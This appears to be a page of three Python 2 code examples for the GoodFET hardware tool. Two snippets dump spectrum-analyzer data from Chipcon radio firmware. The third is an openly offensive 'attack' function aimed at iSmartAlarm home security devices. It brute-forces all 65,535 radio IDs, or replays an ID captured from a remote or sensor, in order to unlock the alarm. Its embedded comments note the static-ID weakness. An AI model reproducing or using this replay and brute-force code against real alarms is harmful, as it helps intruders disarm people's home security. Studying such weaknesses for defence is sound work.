Beispiel #1
from GoodFETCC import GoodFETCC
from intelhex import IntelHex16bit, IntelHex
import time

# Sleep intervals, all expressed in seconds
sshsi = 1      # 1 second
shsi = 10      # 10 seconds
mdsi = 60      # 1 minute
lgsi = 120     # 2 minutes
xlgsi = 1200   # 20 minutes

# Open the GoodFET serial link and start the Chipcon client session.
client = GoodFETCC()
client.serInit()

client.setup()
client.start()

# Halt and release the target CPU once, in case a previous run failed
# part-way and left it in an unknown state.
client.CChaltcpu()
client.CCreleasecpu()

# Channel number -> approximate frequency in MHz.
# Channels 0..52 map to 902..928 MHz in 0.5 MHz steps; channel 0 is
# included, which is why there are 53 channels.
max_chan = 53
chan_dict = {chan: (chan * .5) + 902 for chan in range(max_chan)}

# Start addresses of three consecutive regions, each one beginning where
# the previous one ends.
# NOTE(review): presumably these are target memory addresses read later in
# the script; the reads are not visible here -- confirm.
chan_data_start = 0xF000                         # 53 chans x 6 bytes
chan_min_start = chan_data_start + max_chan * 6  # 0xF13E, 53 chans x 1 byte
chan_chg_start = chan_min_start + max_chan       # 0xF173, 3500 bytes
Beispiel #2
# This code dumps the spectrum analyzer data from Mike Ossmann's
# spectrum analyzer firmware.                                                                                                              

import sys;

sys.path.append('/Users/travis/svn/goodfet/trunk/client/')

from GoodFETCC import GoodFETCC;
from intelhex import IntelHex16bit, IntelHex;
import time;

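# Open the GoodFET serial link and start the Chipcon client session.
client = GoodFETCC()
client.serInit()

client.setup()
client.start()

# 132 rows of 8 bytes, read starting at 0xF000.
bytescount = 8 * 132
bytestart = 0xf000

# Poll forever: once a second, halt the target, dump the buffer as hex and
# let the target run again. The loop only ends when the process is
# interrupted or an exception propagates.
while 1:
    time.sleep(1)
    client.CChaltcpu()
    try:
        # Collect the pieces in a list and join once; rebuilding the whole
        # string for every byte is quadratic in the dump size.
        parts = []
        for offset in range(bytescount):
            parts.append(" %02x" % client.CCpeekdatabyte(bytestart + offset))
            # Break the line after every 8th byte.
            if offset % 8 == 7:
                parts.append("\n")
        # One parenthesised argument prints the same under the Python 2
        # print statement as under the print function.
        print("".join(parts))
        sys.stdout.flush()
    finally:
        # Always resume the target, even if a read fails or the user
        # interrupts the dump; otherwise the CPU would be left halted.
        # NOTE(review): assumes CCreleasecpu() is safe to call after an
        # interrupted peek -- confirm against the GoodFET client.
        client.CCreleasecpu()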
Beispiel #3
def attack(attack_type):
    """Flash an ID record through the GoodFET, then poke the Arduino over serial.

    attack_type selects the mode; it is compared as a string:
      '0'   -- write each counter value from 1 to 65535 into bytes 13-14 of
               a fixed 16-byte template and run one flash/poke cycle per
               value.
      '2'   -- build the record from the module-global src_id and wait for
               ENTER before the single flash/poke cycle.
      other -- same record as '2', but sleep args.delay seconds first.

    One cycle flashes the output of data(32752, ...) followed by the Intel
    HEX end-of-file record, stops the GoodFET client, waits, and sends one
    byte through serialpoke(). Every path ends in exit_clean(); any
    Exception is printed and also ends in exit_clean().

    NOTE(review): the ID is the only value that changes between cycles, so
    the receiving device appears to be identified by a static value that is
    either enumerated ('0') or replayed from a capture (src_id). On the
    defensive side, check whether the receiver uses rolling codes or message
    authentication and whether it locks out repeated unknown IDs -- confirm
    against the device protocol, which is not visible here.
    """
    try:
        # Both names are rebound/read at module level; `ser` is assigned
        # below, `args` is only read.
        global ser
        global args

        # Single character handed to serialpoke() after each flash.
        byte = '1'

        # Initialize GoodFET serial port connection
        client = GoodFETCC()
        client.serInit()

        # Connect to GoodFET
        client.setup()

        # Initialize GoodFET client multiple times, this is due to poor JTAG latching
        client.start()
        client.start()
        client.start()
        client.start()

        # Open serial pipe to Arduino (9600 baud, non-blocking reads)
        ser = serial.Serial(args.port, 9600, timeout=0)

        if attack_type == '0':
            clearscreen()

            # 32 hex characters = 16 bytes. NOTE: `id` and `bytes` shadow
            # the builtins of the same name for the rest of this function.
            id = 'FFFFFFFFFFFFFF0000000000070000FF'
            bytes = bytearray.fromhex(id)

            counter = 0  #38520

            # counter is incremented before use, so the values written are
            # 1..65535; 0 is never written.
            while True:
                if counter == 65535:
                    break
                counter += 1
                # presumably offset() returns the counter as 4 hex digits
                # (2 bytes); verify against its definition
                bytes[13:15] = unhexlify(offset(counter))

                # presumably data() renders an Intel HEX data record at
                # address 32752 (0x7FF0); ':00000001FF' is the Intel HEX
                # end-of-file record
                f = StringIO(data(32752, bytes) + '\n:00000001FF')
                print pink("IHEX:\n" + f.getvalue() + '\n')
                client.flash(f)
                f.close()

                # The fixed sleeps put a floor of about 3.1 s on each cycle.
                client.stop()
                sleep(2.5)
                serialpoke(byte)
                sleep(0.6)
                client.start()
            print green(
                "[SUCCESS] All 65536 ID's have been exhausted, good day.")
            exit_clean()

        else:

            # src_id is a module-level value set elsewhere; a `global`
            # statement applies to the whole function regardless of where
            # it appears.
            global src_id

            print green(
                "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n"
            )

            # assumes src_id is a hex string of even length -- TODO confirm
            id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF'
            bytes = bytearray.fromhex(id)

            if attack_type == '2':
                # Manual mode: block until the operator presses ENTER.
                raw_input('Press [ENTER] when ready to unlock:')
            else:
                print yellowbold(
                    "[INFO] Delay mode enabled. Waiting %i seconds till unlock"
                    % args.delay)
                sleep(args.delay)

            # Same flash/poke cycle as above, run once; the client is not
            # restarted afterwards.
            f = StringIO(data(32752, bytes) + '\n:00000001FF')
            print pink("IHEX:\n" + f.getvalue() + '\n')
            client.flash(f)
            f.close()

            client.stop()
            sleep(2.5)
            serialpoke(byte)
            sleep(0.6)
        # Printed without checking any response from the device.
        print green("[SUCCESS] Hopefully unlocked :D")
        exit_clean()

    except Exception, e:
        # Python 2 except syntax. The message mentions flashing, but this
        # handler covers every Exception raised inside the try block.
        print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e)
        exit_clean()